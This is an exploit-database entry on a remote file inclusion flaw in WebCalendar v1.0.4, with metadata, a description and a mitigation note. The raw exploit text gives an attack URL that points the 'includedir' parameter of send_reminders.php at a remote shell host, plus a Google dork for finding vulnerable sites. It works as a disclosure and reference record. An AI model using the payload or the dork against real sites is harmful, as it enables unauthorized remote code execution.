header-logo
Suggest Exploit
vendor:
WebCalendar
by:
Cr@zy_King
5.5
CVSS
MEDIUM
Remote File Inclusion
98
CWE
Product Name: WebCalendar
Affected Version From: 1.0.4
Affected Version To: 1.0.4
Patch Exists: NO
Related CWE:
CPE: a:webcalendar:webcalendar:1.0.4
Metasploit:
Other Scripts:
Platforms Tested:
2008

WebCalendar v1.0.4 Remote File Include

This exploit allows an attacker to include remote files in the WebCalendar v1.0.4 application. The vulnerability is triggered by the 'includedir' parameter in the 'send_reminders.php' file. By manipulating this parameter, an attacker can include a malicious file hosted on a remote server.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a newer version of WebCalendar that addresses this issue. Additionally, input validation should be implemented to prevent the inclusion of remote files.
Source

Exploit-DB raw data:

Cr@zy_King :\ BiyoSecurity Team

WebCalendar v1.0.4 Remote Fıle Include

Demo - Down : http://webcalendar.sourceforge.net/

http://localhost/patch/tools/send_reminders.php?noSet=0&includedir=http://sheLLz?

Google Dork : "WebCalendar v1.0.4"

                           www.biyosecurity.com

Greatz : aLL My Friend'Z & nETKILLER

# milw0rm.com [2008-06-17]

Navigation

Suggest Exploit

Services By CQR